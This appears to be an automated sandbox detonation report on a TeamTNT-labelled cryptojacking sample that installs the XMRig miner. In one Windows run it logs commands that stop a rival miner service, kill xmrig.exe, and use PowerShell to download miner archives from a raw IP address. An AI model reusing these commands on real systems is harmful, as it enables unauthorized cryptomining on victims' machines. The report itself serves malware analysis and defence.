"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\WinRing0x64.sys.exe"

Network

N/A

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20210920

Max time kernel

118s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\xmrig\xmrig.exe"

Network

N/A

Files

memory/832-54-0x00000000002E0000-0x0000000000300000-memory.dmp

memory/832-55-0x00000000003C0000-0x00000000003C4000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

debian9-mipsbe-en-20211025

Max time kernel

0s

Command Line

[/tmp/147773066/payload.dat]

Signatures

N/A

Processes

/tmp/147773066/payload.dat

[/tmp/147773066/payload.dat]

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win7-en-20211014

Max time kernel

119s

Max time network

125s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

Signatures

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 556 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 836 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1848 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig-6.13.1-msvc-win64.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

Network

N/A

Files

memory/556-55-0x0000000000000000-mapping.dmp

memory/576-56-0x0000000000000000-mapping.dmp

memory/980-57-0x0000000000000000-mapping.dmp

memory/1756-58-0x0000000000000000-mapping.dmp

memory/932-59-0x0000000000000000-mapping.dmp

memory/1768-60-0x0000000000000000-mapping.dmp

memory/300-61-0x0000000000000000-mapping.dmp

memory/592-62-0x0000000000000000-mapping.dmp

memory/1356-63-0x0000000000000000-mapping.dmp

memory/836-64-0x0000000000000000-mapping.dmp

memory/1772-65-0x0000000000000000-mapping.dmp

memory/1752-66-0x0000000000000000-mapping.dmp

memory/1752-67-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

memory/1752-69-0x0000000002590000-0x0000000002592000-memory.dmp

memory/1752-70-0x0000000002592000-0x0000000002594000-memory.dmp

memory/1752-71-0x0000000002594000-0x0000000002597000-memory.dmp

memory/1752-68-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1752-72-0x000000000259B000-0x00000000025BA000-memory.dmp

memory/1848-73-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 79e4c0b77b8b96fda81ae95dfd4ec654
SHA1 0c5c5d2367b1c05c1b3993cef2b1056461df04a1
SHA256 2b6e568f5e6f02d719fdb9a2d2cb2ba56edaaedee44cf3fbe0be7cced67dbb59
SHA512 d7f1d7e3501208de6c2549cefd6348e2c4243f01240fba19d2df8ed553a2361d6ecea686679a4f510d81139bc63f52914d63b1fcbc7984d93de2f96539161330

memory/1848-76-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

memory/1848-78-0x0000000002632000-0x0000000002634000-memory.dmp

memory/1848-79-0x0000000002634000-0x0000000002637000-memory.dmp

memory/1848-77-0x0000000002630000-0x0000000002632000-memory.dmp

memory/1848-80-0x000000000263B000-0x000000000265A000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A